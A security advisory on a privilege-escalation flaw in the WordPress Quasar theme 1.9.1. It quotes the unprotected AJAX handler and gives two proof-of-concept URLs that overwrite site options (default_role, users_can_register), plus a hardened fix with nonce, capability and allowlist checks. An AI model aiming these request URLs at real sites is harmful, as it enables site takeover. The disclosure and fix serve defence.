wp-quasar.txt
WordPress Quasar Theme Privilege Escalation
[-] Theme Link:
http://themeforest.net/item/quasar-wordpress-theme-with-animation-builder/6126939?ref=XanderRock
[-] Affected Version:
Version 1.9.1
[-] Vulnerability Description:
The vulnerable code is located in the /rock-builder/rock-builder-ui.php script:
function rock_builder_save_template(){
    // Every value is taken straight from the request; no nonce check and no
    // capability check precede the writes below.
    $data = $_REQUEST['data'];
    $template = $_REQUEST['template'];
    $templateName = $template['name'];
    $templateDBName = $template['database_name'];
    // The option name is caller-controlled, so any row of wp_options can be overwritten.
    update_option($templateDBName, $data);
    $builderReferences = get_option("rock_builder_references",array());
    $i = 0;
    foreach($builderReferences as $ref){
        if($ref['database_name'] == $templateDBName){
            $builderReferences[$i]['name'] = $templateName;
            update_option("rock_builder_references",$builderReferences);
            //echo "FOUND";
            break;
        }
        $i++;
    }
    exit;
}
// The wp_ajax_ hook (without a nopriv_ variant) exposes the handler to every authenticated user.
add_action("wp_ajax_rockAjax_save_builder_template","rock_builder_save_template");
Because the handler is registered on the wp_ajax_ hook with no capability check and no nonce, any logged-in user can call rock_builder_save_template and write an arbitrary value to an arbitrary WordPress option. This allows modifying site settings and adding a new administrator, which can lead to a full site takeover.
[-] Proof of Concept:
Accessing the URL below as a logged-in user sets the default role of every newly registered user to administrator (if you already have a user account):
http://domain.tld/wp-admin/admin-ajax.php?action=rockAjax_save_builder_template&data=administrator&template%5Bdatabase_name%5D=default_role
Accessing the URL below as a logged-in user enables user registration if it was disabled. Because no nonce is checked, the request can also be triggered by sending the link to a logged-in user or administrator (CSRF):
http://domain.tld/wp-admin/admin-ajax.php?action=rockAjax_save_builder_template&data=1&template%5Bdatabase_name%5D=users_can_register
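A hardened version of the handler, added here as an example rather than taken from the theme: it adds the nonce and capability checks the description above notes are missing and only writes options that are already registered in rock_builder_references, so core options such as default_role and users_can_register cannot be reached. The nonce action name 'rock_builder_save' and request field 'nonce' are assumptions about how the builder UI would be wired.

```php
<?php
// Hardened replacement for rock_builder_save_template (added example, not theme code).
// Assumption: the builder UI sends wp_create_nonce('rock_builder_save') in the 'nonce' field.

function rock_builder_save_template_hardened() {
    // CSRF: reject requests without a valid nonce for this action.
    // check_ajax_referer() terminates the request (wp_die) when the nonce is invalid.
    check_ajax_referer( 'rock_builder_save', 'nonce' );

    // Authorization: wp_ajax_ only guarantees a logged-in user. Writing site
    // options is an administrative action, so require manage_options explicitly.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    $template = ( isset( $_REQUEST['template'] ) && is_array( $_REQUEST['template'] ) )
        ? $_REQUEST['template'] : array();
    $db_name = isset( $template['database_name'] )
        ? sanitize_text_field( wp_unslash( $template['database_name'] ) ) : '';
    $name = isset( $template['name'] )
        ? sanitize_text_field( wp_unslash( $template['name'] ) ) : '';

    // Allowlist: the client may only name an option that the builder itself
    // registered earlier. Unknown names (default_role, users_can_register, ...)
    // are rejected before any update_option() call.
    $references = get_option( 'rock_builder_references', array() );
    $known = false;
    foreach ( $references as $i => $ref ) {
        if ( isset( $ref['database_name'] ) && $ref['database_name'] === $db_name ) {
            $references[ $i ]['name'] = $name;
            $known = true;
            break;
        }
    }
    if ( '' === $db_name || ! $known ) {
        wp_send_json_error( 'unknown template', 400 );
    }

    // Only now is anything persisted, and only to the vetted template option.
    $data = isset( $_REQUEST['data'] ) ? wp_unslash( $_REQUEST['data'] ) : '';
    update_option( $db_name, $data );
    update_option( 'rock_builder_references', $references );
    wp_send_json_success();
}
add_action( 'wp_ajax_rockAjax_save_builder_template', 'rock_builder_save_template_hardened' );
```

With these checks in place, the two proof-of-concept URLs above fail at the nonce check, and even a forged nonce cannot reach a core option because the name is not in the builder's reference list.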